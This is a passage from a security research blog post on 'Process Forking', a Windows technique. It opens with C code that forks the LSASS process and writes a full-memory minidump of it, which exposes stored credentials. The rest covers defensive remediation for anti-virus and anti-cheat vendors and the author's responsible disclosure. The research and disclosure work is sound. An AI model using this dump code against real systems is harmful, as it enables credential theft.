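    HANDLE hFile = CreateFileW(dumpPath, GENERIC_WRITE, 0, NULL,
                               CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    // Step 3: create a fork child of LSASS (see ForkRemoteProcess above).
    HANDLE hFork = ForkRemoteProcess(lsassPid);
    BOOL ok = FALSE;

    if (hFork != NULL)
    {
        // Step 4: the fork shares LSASS's private memory, so a full-memory
        // minidump of the fork contains the same secrets.
        ok = MiniDumpWriteDump(hFork, GetProcessId(hFork), hFile,
                               MiniDumpWithFullMemory, NULL, NULL, NULL);
        TerminateProcess(hFork, 0);
        CloseHandle(hFork);
    }

    CloseHandle(hFile);
    return ok;
}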

Proof of Concept

A simple proof-of-concept utility and library have been published on GitHub.

Conclusion

Process Forking still requires that an attacker have access to the victim process under the default Windows security model. Process Forking does not break integrity boundaries, and attackers are restricted to processes running at the same privilege level as they are. What Process Forking does offer is a largely ignored alternative to the handle rights that are already known to be potentially malicious.

Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping PROCESS_CREATE_PROCESS handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.

Didn't I see this on Twitter yesterday?

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

— diversenok (@diversenok_zero) November 25, 2021

Yesterday morning, I saw this interesting tweet from @diversenok_zero explaining the same method discussed in this blog post.

One approach I like to take with new research or methods I haven't investigated thoroughly yet is to generate a SHA256 hash of the idea and post it somewhere public where the timestamp is recorded. This way, in cases like this where my research overlaps with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th, 2021, I posted a public GitHub gist of the following SHA256 hash:

D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7

You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.

If you generate a SHA256 hash of the quote above, you'll notice it matches the one I publicly posted back in June.

I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.
